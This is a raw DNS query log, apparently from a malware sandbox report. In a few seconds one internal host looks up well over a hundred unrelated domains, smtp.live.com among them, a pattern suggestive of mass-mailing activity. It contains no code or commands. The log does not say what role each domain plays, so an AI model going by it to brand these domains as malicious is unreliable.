                                                                                                                                                                              Sep 15, 2023 07:28:21.332741976 CEST192.168.2.38.8.8.80xa795Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.337897062 CEST192.168.2.38.8.8.80x165dStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.354692936 CEST192.168.2.38.8.8.80xfaeeStandard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.358624935 CEST192.168.2.38.8.8.80x10f3Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.375296116 CEST192.168.2.38.8.8.80xe000Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.403789043 CEST192.168.2.38.8.8.80x6f9dStandard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.423521042 CEST192.168.2.38.8.8.80xe0e2Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.424817085 CEST192.168.2.38.8.8.80x4e59Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.432528973 CEST192.168.2.38.8.8.80x2c70Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.512624979 CEST192.168.2.38.8.8.80x87f7Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.545259953 CEST192.168.2.38.8.8.80x1e31Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.557054996 CEST192.168.2.38.8.8.80x31caStandard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.583101988 CEST192.168.2.38.8.8.80x34fcStandard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.647766113 CEST192.168.2.38.8.8.80x345aStandard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.671019077 CEST192.168.2.38.8.8.80xa8ffStandard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.683032990 CEST192.168.2.38.8.8.80x539Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.696513891 CEST192.168.2.38.8.8.80x559cStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.697282076 CEST192.168.2.38.8.8.80xc363Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.698220015 CEST192.168.2.38.8.8.80xcf66Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.745865107 CEST192.168.2.38.8.8.80x6847Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.747051954 CEST192.168.2.38.8.8.80x4f00Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.775700092 CEST192.168.2.38.8.8.80xee14Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.795156002 CEST192.168.2.38.8.8.80x2b68Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.800575018 CEST192.168.2.38.8.8.80xf96Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.839270115 CEST192.168.2.38.8.8.80x7098Standard query (0)78san.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.839948893 CEST192.168.2.38.8.8.80xdf02Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.842283010 CEST192.168.2.38.8.8.80xb287Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.844842911 CEST192.168.2.38.8.8.80x87d0Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.861320019 CEST192.168.2.38.8.8.80x56b2Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.873766899 CEST192.168.2.38.8.8.80xc845Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.886538029 CEST192.168.2.38.8.8.80xb349Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.890973091 CEST192.168.2.38.8.8.80x8d78Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.900842905 CEST192.168.2.38.8.8.80x1ba7Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:21.951004982 CEST192.168.2.38.8.8.80xf7e3Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.014365911 CEST192.168.2.38.8.8.80x1996Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.017029047 CEST192.168.2.38.8.8.80xe6faStandard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.029784918 CEST192.168.2.38.8.8.80x7057Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.033987999 CEST192.168.2.38.8.8.80xc4b0Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.036082983 CEST192.168.2.38.8.8.80x6d49Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.039356947 CEST192.168.2.38.8.8.80x375fStandard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.045718908 CEST192.168.2.38.8.8.80x969Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.058325052 CEST192.168.2.38.8.8.80xb6d2Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.104590893 CEST192.168.2.38.8.8.80x2da0Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.108861923 CEST192.168.2.38.8.8.80xd319Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.111917973 CEST192.168.2.38.8.8.80xa345Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.151086092 CEST192.168.2.38.8.8.80xa9d9Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.151210070 CEST192.168.2.38.8.8.80x6e6dStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.167855024 CEST192.168.2.38.8.8.80xa41Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.170608997 CEST192.168.2.38.8.8.80xda02Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.200932980 CEST192.168.2.38.8.8.80xec55Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.200984001 CEST192.168.2.38.8.8.80x87d1Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.225976944 CEST192.168.2.38.8.8.80xd900Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.227399111 CEST192.168.2.38.8.8.80x88fStandard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.248303890 CEST192.168.2.38.8.8.80x1335Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.275914907 CEST192.168.2.38.8.8.80xbd3dStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.285617113 CEST192.168.2.38.8.8.80x8303Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.330888987 CEST192.168.2.38.8.8.80x27b0Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.353940010 CEST192.168.2.38.8.8.80x22f4Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.371968985 CEST192.168.2.38.8.8.80x3807Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.407639027 CEST192.168.2.38.8.8.80xa179Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.407639027 CEST192.168.2.38.8.8.80xc4c4Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.407639027 CEST192.168.2.38.8.8.80xa94cStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.424105883 CEST192.168.2.38.8.8.80x624eStandard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.429630041 CEST192.168.2.38.8.8.80xd682Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.455501080 CEST192.168.2.38.8.8.80x7d2bStandard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.458040953 CEST192.168.2.38.8.8.80xc16Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.468096018 CEST192.168.2.38.8.8.80xbf5cStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.480099916 CEST192.168.2.38.8.8.80x5cdStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.505304098 CEST192.168.2.38.8.8.80x996cStandard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.507580042 CEST192.168.2.38.8.8.80x1965Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.509445906 CEST192.168.2.38.8.8.80x9623Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.549504995 CEST192.168.2.38.8.8.80xa9f3Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.551701069 CEST192.168.2.38.8.8.80x8baStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.559876919 CEST192.168.2.38.8.8.80xc397Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.587860107 CEST192.168.2.38.8.8.80x98c3Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.608134985 CEST192.168.2.38.8.8.80xb2b4Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.609133959 CEST192.168.2.38.8.8.80xd4caStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.626946926 CEST192.168.2.38.8.8.80x5f96Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.638068914 CEST192.168.2.38.8.8.80xde02Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.655966997 CEST192.168.2.38.8.8.80x42fbStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.701761961 CEST192.168.2.38.8.8.80x2f30Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.704370975 CEST192.168.2.38.8.8.80xfbb4Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.719335079 CEST192.168.2.38.8.8.80x2173Standard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.729892969 CEST192.168.2.38.8.8.80x5b6bStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.749725103 CEST192.168.2.38.8.8.80xdcf7Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.752099991 CEST192.168.2.38.8.8.80x3ba1Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.758043051 CEST192.168.2.38.8.8.80x6617Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.764195919 CEST192.168.2.38.8.8.80x9bb9Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.828077078 CEST192.168.2.38.8.8.80x3e63Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.832112074 CEST192.168.2.38.8.8.80x9bf3Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.838982105 CEST192.168.2.38.8.8.80x87deStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.848241091 CEST192.168.2.38.8.8.80x36bStandard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.851308107 CEST192.168.2.38.8.8.80x9716Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.857630968 CEST192.168.2.38.8.8.80xc266Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.880114079 CEST192.168.2.38.8.8.80x94d7Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.901716948 CEST192.168.2.38.8.8.80x8d78Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.916204929 CEST192.168.2.38.8.8.80x6756Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.920109034 CEST192.168.2.38.8.8.80xd999Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.938656092 CEST192.168.2.38.8.8.80x37d9Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.948129892 CEST192.168.2.38.8.8.80x44b8Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.952104092 CEST192.168.2.38.8.8.80x1a14Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.953847885 CEST192.168.2.38.8.8.80x62abStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:22.984189034 CEST192.168.2.38.8.8.80x833dStandard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.040213108 CEST192.168.2.38.8.8.80xdc16Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.044116974 CEST192.168.2.38.8.8.80xc4b0Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.052100897 CEST192.168.2.38.8.8.80x8908Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.059640884 CEST192.168.2.38.8.8.80x1f33Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.105879068 CEST192.168.2.38.8.8.80x25f6Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.124262094 CEST192.168.2.38.8.8.80xd319Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.127156019 CEST192.168.2.38.8.8.80x4eebStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.128113031 CEST192.168.2.38.8.8.80xef03Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.136979103 CEST192.168.2.38.8.8.80xd47bStandard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.152118921 CEST192.168.2.38.8.8.80x17d8Standard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.216845036 CEST192.168.2.38.8.8.80x22cbStandard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.253091097 CEST192.168.2.38.8.8.80xe778Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.281537056 CEST192.168.2.38.8.8.80xe4b9Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.295382023 CEST192.168.2.38.8.8.80x3e34Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.354753017 CEST192.168.2.38.8.8.80x165dStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.362282991 CEST192.168.2.38.8.8.80x1ea0Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.372817039 CEST192.168.2.38.8.8.80x47d7Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.376735926 CEST192.168.2.38.8.8.80xbbf2Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.378274918 CEST192.168.2.38.8.8.80x5518Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.380111933 CEST192.168.2.38.8.8.80x28d7Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.432476997 CEST192.168.2.38.8.8.80x4322Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.473165035 CEST192.168.2.38.8.8.80x97fdStandard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.474205971 CEST192.168.2.38.8.8.80xe1c6Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.477514982 CEST192.168.2.38.8.8.80xe191Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.478100061 CEST192.168.2.38.8.8.80xbf5cStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.494682074 CEST192.168.2.38.8.8.80xa2b0Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.530932903 CEST192.168.2.38.8.8.80x213aStandard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.576236010 CEST192.168.2.38.8.8.80xb7fStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.580166101 CEST192.168.2.38.8.8.80xb9aaStandard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.582201004 CEST192.168.2.38.8.8.80x794cStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.611699104 CEST192.168.2.38.8.8.80x8d15Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.613271952 CEST192.168.2.38.8.8.80x9efStandard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.615072966 CEST192.168.2.38.8.8.80x749fStandard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.619270086 CEST192.168.2.38.8.8.80xfa66Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.637387037 CEST192.168.2.38.8.8.80x5fceStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.644722939 CEST192.168.2.38.8.8.80x41efStandard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.671034098 CEST192.168.2.38.8.8.80xc7a0Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.729475975 CEST192.168.2.38.8.8.80x9f43Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.729748964 CEST192.168.2.38.8.8.80xe3d4Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.733969927 CEST192.168.2.38.8.8.80x9c2bStandard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.778747082 CEST192.168.2.38.8.8.80x3cb9Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.791311979 CEST192.168.2.38.8.8.80x1282Standard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.822669029 CEST192.168.2.38.8.8.80xf96dStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.858232975 CEST192.168.2.38.8.8.80x2412Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.952622890 CEST192.168.2.38.8.8.80x4649Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.965280056 CEST192.168.2.38.8.8.80x5e8cStandard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:23.981164932 CEST192.168.2.38.8.8.80x1239Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.019551039 CEST192.168.2.38.8.8.80x9130Standard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.031153917 CEST192.168.2.38.8.8.80x99afStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.040997982 CEST192.168.2.38.8.8.80xc4b0Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.077918053 CEST192.168.2.38.8.8.80x3860Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.092725039 CEST192.168.2.38.8.8.80x342Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.102993011 CEST192.168.2.38.8.8.80x7cecStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.129616976 CEST192.168.2.38.8.8.80xe205Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.137644053 CEST192.168.2.38.8.8.80xdcffStandard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.154531002 CEST192.168.2.38.8.8.80xa2cdStandard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.156905890 CEST192.168.2.38.8.8.80xce0cStandard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.161186934 CEST192.168.2.38.8.8.80x2eStandard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.204143047 CEST192.168.2.38.8.8.80x7d6bStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.216384888 CEST192.168.2.38.8.8.80xae0eStandard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.229075909 CEST192.168.2.38.8.8.80x67baStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.231247902 CEST192.168.2.38.8.8.80xa108Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.233447075 CEST192.168.2.38.8.8.80x4226Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.261905909 CEST192.168.2.38.8.8.80xc969Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.261905909 CEST192.168.2.38.8.8.80xac52Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.292810917 CEST192.168.2.38.8.8.80x9ff8Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.324099064 CEST192.168.2.38.8.8.80xff9Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.364897966 CEST192.168.2.38.8.8.80xb251Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.387116909 CEST192.168.2.38.8.8.80xdd7Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.463264942 CEST192.168.2.38.8.8.80xea49Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.525669098 CEST192.168.2.38.8.8.80xc9c9Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.590244055 CEST192.168.2.38.8.8.80xce62Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.623006105 CEST192.168.2.38.8.8.80x86dcStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.734566927 CEST192.168.2.38.8.8.80x73edStandard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:24.975785017 CEST192.168.2.38.8.8.80x9feaStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.052233934 CEST192.168.2.38.8.8.80xa9ddStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.058752060 CEST192.168.2.38.8.8.80xedebStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.152681112 CEST192.168.2.38.8.8.80x6fc9Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.250061989 CEST192.168.2.38.8.8.80xfb0eStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.306948900 CEST192.168.2.38.8.8.80x3256Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.307009935 CEST192.168.2.38.8.8.80x436dStandard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.313895941 CEST192.168.2.38.8.8.80x52b9Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.516508102 CEST192.168.2.38.8.8.80xcd38Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.626946926 CEST192.168.2.38.8.8.80x59c9Standard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.775636911 CEST192.168.2.38.8.8.80xb42Standard query (0)kumaden.comA (IP address)IN (0x0001)false
